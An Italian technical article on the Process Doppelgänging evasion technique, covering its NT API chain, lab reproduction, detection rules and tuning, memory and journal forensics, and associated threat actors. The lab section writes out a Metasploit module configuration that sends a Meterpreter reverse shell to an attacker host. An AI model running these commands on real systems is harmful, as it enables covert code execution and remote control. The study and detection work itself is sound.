Process Doppelgänging: Iniezione Fantasma via NTFS Transazionale (T1055.013)

Il Process Doppelgänging è una tecnica avanzata che richiede interazione diretta con API native NT, il che la rende più complessa da implementare rispetto al classico hollowing. Per replicarla in laboratorio servono familiarità con le API non documentate del kernel Windows e un ambiente isolato — una VM Windows 10/11 con Defender disabilitato è il punto di partenza ideale.

La catena d'attacco si basa su quattro chiamate NT native eseguite in sequenza. La prima fase crea una transazione NTFS tramite NtCreateTransaction, apre un file legittimo (ad esempio svchost.exe o calc.exe) all'interno del contesto transazionale con CreateFileTransacted, e sovrascrive il contenuto con il payload malevolo usando NtWriteFile. La seconda fase carica l'immagine modificata in memoria con NtCreateSection, creando una sezione di tipo SEC_IMAGE. A questo punto si esegue il rollback della transazione con NtRollbackTransaction: il file su disco torna intatto, ma la sezione in memoria conserva il payload. Infine, NtCreateProcessEx genera un nuovo processo dalla sezione corrotta, e NtCreateThreadEx ne avvia l'esecuzione.

Per la fase di laboratorio, il framework più diretto è il proof-of-concept pubblicato dalla ricercatrice hasherezade su GitHub, denominato process_doppelganging (open source). Questo PoC implementa le quattro fasi in C e può essere compilato con Visual Studio. Il comando di esecuzione è semplice:

process_doppelganging.exe <eseguibile_target> <payload_dll_o_exe>

Un'alternativa integrata nei framework offensivi è il modulo di Metasploit (open source). Per utilizzarlo:

use exploit/windows/local/process_doppelganging set PAYLOAD windows/meterpreter/reverse_tcp set LHOST <ip_attaccante> set LPORT 4444 set TARGET_PE <path_eseguibile_legittimo> run

Durante il test è fondamentale monitorare cosa vede il difensore. Affianca all'esecuzione una console Sysmon (gratuito) configurata per catturare eventi di creazione processo (EventID 1) e accesso ai file (EventID 11). Noterai che il processo figlio appare con il nome dell'eseguibile legittimo, ma l'hash dell'immagine in memoria non corrisponde a quello su disco — un artefatto chiave per chi difende.

Un aspetto da testare è la correlazione temporale: tra il rollback TxF e la creazione del thread passano tipicamente millisecondi. Strumenti EDR avanzati possono intercettare questa finestra, quindi verifica se la tua configurazione difensiva la rileva prima di dichiarare il test completato.

La detection del Process Doppelgänging è notoriamente difficile perché la tecnica evita le API classiche di injection. Tuttavia, il meccanismo lascia impronte specifiche se si monitorano le fonti giuste con la granularità corretta.

La prima log source critica è Sysmon (gratuito), che va configurato con un file XML che catturi almeno gli eventi di creazione processo (EventID 1), creazione thread remoto (EventID 8) e accesso al file system (EventID 11). Il segnale più forte è un processo il cui ImagePath punta a un eseguibile legittimo, ma il cui hash calcolato dall'immagine in memoria diverge dall'hash del file su disco. Sysmon cattura l'hash dell'immagine caricata nel campo Hashes dell'EventID 1 — confrontarlo con l'hash noto del binario è il primo filtro.

La seconda fonte è il provider ETW Microsoft-Windows-Kernel-Process, che espone eventi di basso livello sulla creazione di processi e thread. In particolare, l'analisi correlata secondo la strategia di detection DET0544 si concentra sull'abuso di NtCreateProcessEx in combinazione con operazioni TxF. L'analisi AN1501 suggerisce di monitorare sequenze di chiamate CreateTransaction seguite da RollbackTransaction entro una finestra temporale ristretta, con successiva creazione di un thread il cui indirizzo di partenza presenta alta entropia — indicatore tipico di shellcode offuscato.

I parametri di tuning da calibrare sono:

• TransactionExecutableNamePattern: i target più comuni sono svchost.exe e calc.exe; filtra le transazioni TxF su questi binari fuori dal contesto di aggiornamento Windows
• TimeWindow_TransactionToExecution: il delta tra rollback e creazione thread è tipicamente inferiore a 1 secondo; soglie superiori generano troppi falsi positivi
• ThreadStartEntropyThreshold: valori di entropia dell'indirizzo di start superiori a 7.0 sono sospetti
• TxF API Call Frequency: più di 2-3 sequenze CreateTransaction/RollbackTransaction per singolo processo in un minuto è anomalo

Per i falsi positivi, il rischio principale viene da software legittimo che utilizza ancora le API TxF — alcuni installer e tool di backup lo fanno. La chiave è correlare: una transazione TxF isolata non è un allarme, ma una transazione TxF seguita da creazione di processo con hash non corrispondente e thread ad alta entropia è un indicatore ad alta confidenza. Un'implementazione efficace prevede una regola SIGMA che catturi la sequenza completa anziché i singoli eventi.

La mitigazione primaria raccomandata è Behavior Prevention on Endpoint (M1040): configurare la soluzione EDR per bloccare sequenze comportamentali che coinvolgono transazioni NTFS e creazione di processi, piuttosto che affidarsi a firme statiche.

L'analisi forense del Process Doppelgänging è insidiosa per design: la tecnica è concepita per non lasciare artefatti su disco. Il rollback della transazione NTFS annulla ogni modifica al file legittimo, quindi il binario malevolo non esiste mai come file persistente. La ricostruzione della timeline deve quindi poggiare su artefatti volatili e su log che catturano il momento dell'esecuzione.

Il punto di partenza è il journal NTFS ($UsnJrnl). Anche se la transazione viene annullata, il journal può registrare l'apertura transazionale del file target. Cerca record con flag di tipo CLOSE su eseguibili legittimi comuni (svchost.exe, calc.exe) che non corrispondono a normali operazioni di sistema. Il tool MFTECmd di Eric Zimmerman (open source) consente di parsare il journal con:

MFTECmd.exe -f "$UsnJrnl:$J" --csv <cartella_output>

Analizzando l'output CSV, filtra per il nome del file target e correla i timestamp con gli eventi Sysmon. Il campo Reason del journal può rivelare operazioni anomale sul file.

Il secondo artefatto critico è il dump della memoria volatile. Se il processo doppler è ancora attivo — o la RAM è stata acquisita prima dello spegnimento — è possibile estrarre l'immagine iniettata direttamente dalla sezione di memoria del processo. Con Volatility 3 (open source):

python3 vol.py -f <immagine_memoria> windows.malfind

Il plugin malfind identifica sezioni di memoria con permessi PAGE_EXECUTE_READWRITE che contengono codice eseguibile non mappato a un file su disco — la firma classica del doppelgänging. Per estrarre il payload:

python3 vol.py -f <immagine_memoria> windows.pslist seguito da windows.memmap --pid <pid_sospetto> --dump

Una volta estratto il blob di memoria, calcolane l'hash e confrontalo con il database di VirusTotal (freemium) per l'attribuzione.

Il terzo elemento della timeline sono i log Sysmon persistiti nel canale WinEventLog:Sysmon. L'EventID 1 registra il processo creato con l'hash dell'immagine in memoria. Se l'hash non corrisponde a quello del file su disco (verificabile con Get-FileHash in PowerShell), hai la prova della sostituzione. L'EventID 8 (CreateRemoteThread) può catturare il momento in cui NtCreateThreadEx avvia l'esecuzione nel processo tainted.

Per campagne note, il malware SynAck abusa delle transazioni NTFS per lanciare processi nascosti, mentre Bazar inietta nel processo target con la stessa tecnica. Cerca IOC specifici di queste famiglie nelle sezioni di memoria estratte: stringhe di configurazione C2, mutex noti e pattern di crittografia caratteristici. Il gruppo Leafminer ha utilizzato questa tecnica per distribuire tool su sistemi compromessi evitando la detection — la presenza di tool post-exploitation associati a questo attore nel contesto di un processo apparentemente legittimo è un forte indicatore.

Il Process Doppelgänging rappresenta un indicatore di sofisticazione tecnica significativa: implementare la catena di quattro chiamate NT native richiede competenze di sviluppo Windows avanzate, il che restringe il campo degli attori a gruppi con capacità di sviluppo malware custom o accesso a framework offensivi maturi.

Leafminer (G0077) è l'unico gruppo APT documentato nell'utilizzo di questa tecnica. Attivo contro obiettivi in Medio Oriente — in particolare settori governativi e business — Leafminer impiega il doppelgänging come meccanismo di evasione durante la fase di deployment degli strumenti post-compromissione. Il pattern operativo è chiaro: una volta ottenuto l'accesso iniziale, il gruppo necessita di distribuire tool aggiuntivi senza attivare le soluzioni di sicurezza endpoint. Il Process Doppelgänging risolve esattamente questo problema, consentendo l'esecuzione sotto il mantello di un processo legittimo.

Sul fronte malware, due famiglie distinte adottano questa tecnica con finalità differenti. SynAck (S0242) è un ransomware che utilizza le transazioni NTFS per lanciare e nascondere i propri processi malevoli — qui la motivazione è puramente economica, e il doppelgänging serve a guadagnare tempo prezioso prima che la cifratura venga rilevata. Bazar (S0534), loader associato all'ecosistema TrickBot, inietta nel processo target usando la stessa tecnica come fase intermedia della catena di distribuzione, tipicamente per scaricare payload di seconda fase senza esporre il loader alla detection.

L'analisi dei pattern rivela un elemento interessante: la tecnica è adottata sia da attori state-sponsored (Leafminer) sia da gruppi criminali (operatori SynAck e Bazar), il che suggerisce che il know-how sia migrato dalla ricerca accademica — presentata originariamente alla conferenza BlackHat Europe 2017 — verso entrambi i segmenti della threat landscape. Questo rende l'attribuzione basata sulla sola presenza di doppelgänging insufficiente: è necessario correlare con gli altri TTP dell'intrusione.

Per il threat modeling predittivo, considera che il Process Doppelgänging è strettamente legato a Windows e alle API TxF. Un eventuale aggiornamento di Microsoft che disabiliti completamente TxF ridurrebbe la superficie d'attacco, ma finché le API rimangono disponibili la tecnica resterà praticabile. Monitora inoltre la comparsa di nuove varianti: la logica delle transazioni NTFS potrebbe essere combinata con altre tecniche di injection per creare ibridi ancora più difficili da rilevare. La sovrapposizione con il Process Hollowing nella fase di "animazione" del processo suggerisce che attori che usano l'una possano facilmente adottare l'altra come fallback.

Framework MITRE ATT&CK v16 — Tecnica T1055.013 (Process Doppelgänging), Tattica TA0005 (Defense Evasion), Tattica TA0004 (Privilege Escalation). Gruppo: G0077 (Leafminer). Software: S0242 (SynAck), S0534 (Bazar). Mitigazione: M1040. Detection: DET0544, AN1501. Tool di detection: Sysmon, Volatility 3, MFTECmd. Integrato con conoscenza professionale per tool e procedure operative.